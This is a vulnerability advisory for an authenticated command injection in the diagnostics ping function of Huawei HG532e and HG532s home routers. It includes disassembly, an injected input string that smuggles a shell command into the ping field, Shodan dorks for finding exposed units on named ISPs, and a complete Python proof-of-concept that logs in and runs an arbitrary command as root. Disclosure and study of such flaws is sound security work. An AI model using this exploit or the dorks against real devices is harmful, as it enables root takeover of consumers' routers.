Huawei HG532, Command Injection

# Authors: Raffaele Forte, Andrea Ferraris
# Product name: Huawei HG532*
# Vendor Homepage: https://www.huawei.com

I. INTRODUCTION

Huawei HG532* are wireless home gateways for home or office ADSL.

The model HG532e is used in Panama by “Cable & Wireless Panama”.
shodan.io dork: “Content-Length: 11881” “no-cache” org:”Cable & Wireless Panama”.

The model HG532s is distributed in Italy since 2012 by Wind-Infostrada and it is still in use.
shodan.io dork: “Content-Length: 10814” “no-cache” org:”Wind”

II. DESCRIPTION

The router is affected by a “Command Injection” vulnerability located in the web-panel allowing an authenticated user to obtain a root access to the system.

The vulnerable function is used to check if a domain/IP is reachable.

Thanks to reverse engineering techniques we were able to identify the snippet of code that performs this action:

[...]
LOAD:00409B58 la $t9, snprintf
LOAD:00409B5C la $a2, aPingSC4VarPing  # "ping %s -c 4 > /var/pingres.txt"
LOAD:00409B64 move $a3, $v0
LOAD:00409B68 li $a1, 0x400
LOAD:00409B6C jalr $t9 ; snprintf      # call snprintf(ping %s..., <cmd>)
LOAD:00409B70 move $a0, $s0
LOAD:00409B74 lw $gp, 0x10($sp)
LOAD:00409B78 nop
LOAD:00409B7C la $t9, system
LOAD:00409B80 nop
LOAD:00409B84 jalr $t9 ; system        # call system with previous snprintf result
LOAD:00409B88 move $a0, $s0
LOAD:00409B8C lw $gp, 0x10($sp)
LOAD:00409B90 move $a0, $s2
LOAD:00409B94 la $t9, ATP_WEB_SendFile
LOAD:00409B98 nop
LOAD:00409B9C jalr $t9 ; ATP_WEB_SendFile
LOAD:00409BA0 move $a1, $s1
[...]

As we can see, the web interface use “system” to execute PING command (LOAD:00409B84) and the command is built from the previous “snprintf” (LOAD:00409B6C) call.

The vulnerability is the lack of input sanitization: the code does not check if the passed string is a valid IP and does not check the presence of dangerous characters.

Usually, the user set an IP/hostname in a web-form and he/she sees the output, but inserting a semicolon (or various injection characters) it is possible to execute others commands.

For example, a legit input may be:

127.0.0.1

A malicious one may be:

127.0.0.1 -c 4; whoami > /var/pingres.txt;#

The first argument “127.0.0.1 -c 4” is to complete the ping command (not strictly necessary). Then, there is a semicolon followed by “whoami”: that is the command that the attacker wants to execute. The “#” allows to ignore the “-c 4 > /var/pingres.txt” which follows the format string placeholder (LOAD:00409B52). Note: it is necessary to redirect output to the file “/var/pingres.txt” in order to obtain a visible command injection, indeed the web application respond with that file (LOAD:00409B9C).

III. PoC – PROOF OF CONCEPT

#!/usr/bin/python
 
import requests
import time
import urllib
import sys
import warnings
import hashlib
import base64

if not sys.warnoptions:
    warnings.simplefilter("ignore")

user = 'user'
## HG532e by Cable & Wireless Panama
## shodan.io dork: "Content-Length: 11881" "no-cache" org:"Cable & Wireless Panama"
password = 'censured'

## HG532s by Wind-Infostrada (Italy)
## shodan.io dork: "Content-Length: 10814" "no-cache" org:"Wind"
#password = 'censured'

password_sha256 = hashlib.sha256(password.encode()).hexdigest()
password_base64 = base64.b64encode(hashlib.sha256(password.encode()).hexdigest())

s = requests.Session()

url = str(sys.argv[1])
cmd = str(sys.argv[2])

payload = urllib.quote_plus(' -c1; '+cmd+' > /var/pingres.txt; #')

data = {'Username':'user','Password':''+password_base64+''}
cookie = {'Language':'en','FirstMenu':'Admin_0','SecondMenu':'Admin_0_0','ThirdMenu':'Admin_0_0_0'}

url_login = url+'/index/login.cgi'

request_login = s.post(url_login, data=data, cookies=cookie, verify=False)

url_diagnose = url+'/html/management/excutecmdfordiagnose.cgi?cmd=127.0.0.1'+payload+'&RequestFile=/html/management/pingstatus.asp'
request_diagnose = s.post(url_diagnose, cookies=cookie, verify=False)

url_logout = url+'/index/logout.cgi'
s.post(url_logout, cookies=cookie)

txt = request_diagnose.text.split('PingResult = "') 

result = txt[1].replace('\\n" + "', '\n')

print'\n'+result.split('";')[0]

IV. BUSINESS IMPACT
This flaw may compromise the integrity of the system and/or expose sensitive information. An attacker is able to obtain a root shell on the device.

V. SYSTEMS AFFECTED
Model: Huawei HG532e
Hardware version: HG532EAM1HG530ERRAMVER.B
Firmware version: V100R001C170B012

Model: Huawei HG532s
Hardware version: HG532SAM1HG530ERRAMVER.B
Firmware version: V100R001C57B011

Most likely all HG532* models are vulnerable.

VI. VULNERABILITY HISTORY
December 10th, 2018: Vendor notification

VII. LEGAL NOTICES
The information contained within this advisory is supplied “as-is” with no warranties or guarantees of fitness of use or otherwise. We accept no responsibility for any damage caused by the use or misuse of this information.